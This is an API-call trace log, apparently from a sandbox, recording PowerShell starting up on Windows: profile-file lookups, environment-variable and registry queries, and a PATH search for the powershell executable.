	[0405.743] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dba0 | out: lpFileInformation=0x16dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0405.743] SetErrorMode (uMode=0x1) returned 0x1
	[0405.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0405.744] SetErrorMode (uMode=0x1) returned 0x1
	[0405.744] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dba0 | out: lpFileInformation=0x16dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0405.744] SetErrorMode (uMode=0x1) returned 0x1
	[0405.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0405.744] SetErrorMode (uMode=0x1) returned 0x1
	[0405.744] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dba0 | out: lpFileInformation=0x16dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0405.744] SetErrorMode (uMode=0x1) returned 0x1
	[0405.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x16d990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0405.744] SetErrorMode (uMode=0x1) returned 0x1
	[0405.745] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x16dba0 | out: lpFileInformation=0x16dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0405.745] SetErrorMode (uMode=0x1) returned 0x1
	[0405.745] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.745] CoTaskMemFree (pv=0x34e8b0) 
	[0405.746] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.746] CoTaskMemFree (pv=0x34e8b0) 
	[0405.746] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.746] CoTaskMemFree (pv=0x34e8b0) 
	[0405.747] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.747] CoTaskMemFree (pv=0x34e8b0) 
	[0405.747] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.747] CoTaskMemFree (pv=0x34e8b0) 
	[0405.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0405.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0405.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0405.748] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f8
	[0405.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1c8
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x320
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0405.749] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0405.750] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.750] CoTaskMemFree (pv=0x34e8b0) 
	[0405.752] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0405.752] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x16dd80 | out: lpMode=0x16dd80) returned 1
	[0405.753] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.753] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.753] CoTaskMemFree (pv=0x34e8b0) 
	[0405.755] SetEvent (hEvent=0x2f8) returned 1
	[0405.756] SetEvent (hEvent=0x328) returned 1
	[0405.756] SetEvent (hEvent=0x32c) returned 1
	[0405.756] SetEvent (hEvent=0x330) returned 1
	[0405.756] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0405.757] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0405.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.757] CoTaskMemFree (pv=0x34e8b0) 
	[0405.758] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dad8 | out: phkResult=0x16dad8*=0x348) returned 0x0
	[0405.758] RegQueryValueExW (in: hKey=0x348, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x16da5c, lpData=0x0, lpcbData=0x16da58*=0x0 | out: lpType=0x16da5c*=0x0, lpData=0x0, lpcbData=0x16da58*=0x0) returned 0x2

Thread:
	id = 198
	os_tid = 0xafc


Thread:
	id = 202
	os_tid = 0xa60


Thread:
	id = 386
	os_tid = 0x60c


Thread:
	id = 454
	os_tid = 0x1108


Thread:
	id = 461
	os_tid = 0x1130

	[0368.259] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0392.578] LocalFree (hMem=0x2b7290) returned 0x0
	[0392.578] CloseHandle (hObject=0x314) returned 1
	[0392.578] CloseHandle (hObject=0x13) returned 1
	[0392.579] CloseHandle (hObject=0xf) returned 1
	[0392.579] RegCloseKey (hKey=0x300) returned 0x0
	[0392.579] RegCloseKey (hKey=0x2fc) returned 0x0
	[0392.579] RegCloseKey (hKey=0x2f8) returned 0x0
	[0392.580] LocalFree (hMem=0x2b7260) returned 0x0
	[0392.580] RegCloseKey (hKey=0x1c8) returned 0x0
	[0395.580] RegCloseKey (hKey=0x1c8) returned 0x0
	[0398.612] RegCloseKey (hKey=0x31c) returned 0x0
	[0398.613] RegCloseKey (hKey=0x314) returned 0x0
	[0398.613] RegCloseKey (hKey=0x300) returned 0x0
	[0398.613] RegCloseKey (hKey=0x1c8) returned 0x0
	[0398.613] RegCloseKey (hKey=0x2f8) returned 0x0
	[0398.613] RegCloseKey (hKey=0x330) returned 0x0
	[0398.614] RegCloseKey (hKey=0x32c) returned 0x0
	[0398.614] RegCloseKey (hKey=0x328) returned 0x0
	[0398.614] RegCloseKey (hKey=0x324) returned 0x0
	[0398.614] RegCloseKey (hKey=0x320) returned 0x0
	[0403.494] RegCloseKey (hKey=0x368) returned 0x0
	[0403.494] RegCloseKey (hKey=0x364) returned 0x0
	[0403.494] RegCloseKey (hKey=0x360) returned 0x0
	[0403.495] RegCloseKey (hKey=0x35c) returned 0x0
	[0403.495] RegCloseKey (hKey=0x31c) returned 0x0
	[0403.495] RegCloseKey (hKey=0x374) returned 0x0
	[0403.495] RegCloseKey (hKey=0x354) returned 0x0
	[0403.495] RegCloseKey (hKey=0x350) returned 0x0
	[0403.496] RegCloseKey (hKey=0x34c) returned 0x0
	[0403.496] RegCloseKey (hKey=0x348) returned 0x0
	[0403.496] RegCloseKey (hKey=0x344) returned 0x0
	[0403.496] RegCloseKey (hKey=0x340) returned 0x0
	[0403.496] RegCloseKey (hKey=0x33c) returned 0x0
	[0403.497] RegCloseKey (hKey=0x320) returned 0x0
	[0403.497] RegCloseKey (hKey=0x370) returned 0x0
	[0403.497] RegCloseKey (hKey=0x36c) returned 0x0
	[0403.497] RegCloseKey (hKey=0x314) returned 0x0
	[0403.498] RegCloseKey (hKey=0x300) returned 0x0
	[0403.498] RegCloseKey (hKey=0x1c8) returned 0x0
	[0403.498] RegCloseKey (hKey=0x2f8) returned 0x0
	[0403.498] RegCloseKey (hKey=0x330) returned 0x0
	[0403.499] RegCloseKey (hKey=0x32c) returned 0x0
	[0403.499] RegCloseKey (hKey=0x328) returned 0x0
	[0403.499] RegCloseKey (hKey=0x324) returned 0x0
	[0641.461] RegCloseKey (hKey=0x348) returned 0x0

Thread:
	id = 554
	os_tid = 0x13f0


Thread:
	id = 598
	os_tid = 0x9a8

	[0406.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0406.561] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409
	[0406.566] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0406.567] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.567] CoTaskMemFree (pv=0x34e8b0) 
	[0406.569] VirtualQuery (in: lpAddress=0x1c76de00, lpBuffer=0x1c76ecc0, dwLength=0x30 | out: lpBuffer=0x1c76ecc0*(BaseAddress=0x1c76d000, AllocationBase=0x1bde0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0406.572] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0406.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.572] CoTaskMemFree (pv=0x34e8b0) 
	[0406.583] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0406.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.583] CoTaskMemFree (pv=0x34e8b0) 
	[0406.587] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0406.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.587] CoTaskMemFree (pv=0x34e8b0) 
	[0406.597] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0406.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.597] CoTaskMemFree (pv=0x34e8b0) 
	[0406.600] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0406.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0406.600] CoTaskMemFree (pv=0x34e8b0) 
	[0407.024] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.024] CoTaskMemFree (pv=0x34e8b0) 
	[0407.029] VirtualQuery (in: lpAddress=0x1c76e0b0, lpBuffer=0x1c76ef70, dwLength=0x30 | out: lpBuffer=0x1c76ef70*(BaseAddress=0x1c76e000, AllocationBase=0x1bde0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.030] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.030] CoTaskMemFree (pv=0x34e8b0) 
	[0407.033] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.033] CoTaskMemFree (pv=0x34e8b0) 
	[0407.033] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.033] CoTaskMemFree (pv=0x34e8b0) 
	[0407.035] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.035] CoTaskMemFree (pv=0x34e8b0) 
	[0407.039] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.039] CoTaskMemFree (pv=0x34e8b0) 
	[0407.396] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.396] CoTaskMemFree (pv=0x34e8b0) 
	[0407.399] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.399] CoTaskMemFree (pv=0x34e8b0) 
	[0407.400] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.400] CoTaskMemFree (pv=0x34e8b0) 
	[0407.402] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.402] CoTaskMemFree (pv=0x34e8b0) 
	[0407.404] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.404] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.404] CoTaskMemFree (pv=0x34e8b0) 
	[0407.405] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.406] CoTaskMemFree (pv=0x34e8b0) 
	[0407.407] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.407] CoTaskMemFree (pv=0x34e8b0) 
	[0407.809] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0407.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0407.809] CoTaskMemFree (pv=0x34e8b0) 
	[0408.226] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0408.226] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0408.226] CoTaskMemFree (pv=0x34e8b0) 
	[0408.229] CoTaskMemAlloc (cb=0x104) returned 0x34e8b0
	[0408.229] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x34e8b0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0408.229] CoTaskMemFree (pv=0x34e8b0) 
	[0408.229] CoTaskMemAlloc (cb=0x128) returned 0x1b7d6320
	[0408.229] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7d6320, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0408.230] CoTaskMemFree (pv=0x1b7d6320) 
	[0408.234] CoTaskMemAlloc (cb=0x20e) returned 0x1b7c95e0
	[0408.234] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7c95e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0408.234] CoTaskMemFree (pv=0x1b7c95e0) 
	[0408.238] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0408.262] SetErrorMode (uMode=0x1) returned 0x1
	[0408.265] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0408.669] SetErrorMode (uMode=0x1) returned 0x1
	[0408.671] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0408.671] SetErrorMode (uMode=0x1) returned 0x1
	[0408.671] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0408.679] SetErrorMode (uMode=0x1) returned 0x1
	[0408.680] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0408.681] SetErrorMode (uMode=0x1) returned 0x1
	[0408.681] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0408.688] SetErrorMode (uMode=0x1) returned 0x1
	[0408.690] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0408.690] SetErrorMode (uMode=0x1) returned 0x1
	[0408.690] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0408.698] SetErrorMode (uMode=0x1) returned 0x1
	[0408.699] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0408.699] SetErrorMode (uMode=0x1) returned 0x1
	[0408.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0408.707] SetErrorMode (uMode=0x1) returned 0x1
	[0409.114] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.114] SetErrorMode (uMode=0x1) returned 0x1
	[0409.115] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.133] SetErrorMode (uMode=0x1) returned 0x1
	[0409.134] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.134] SetErrorMode (uMode=0x1) returned 0x1
	[0409.134] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.141] SetErrorMode (uMode=0x1) returned 0x1
	[0409.142] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.142] SetErrorMode (uMode=0x1) returned 0x1
	[0409.142] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c76dfe0 | out: lpFindFileData=0x1c76dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0409.149] SetErrorMode (uMode=0x1) returned 0x1
	[0409.150] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c76de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0409.150] SetErrorMode (uMode=0x1) returned 0x1
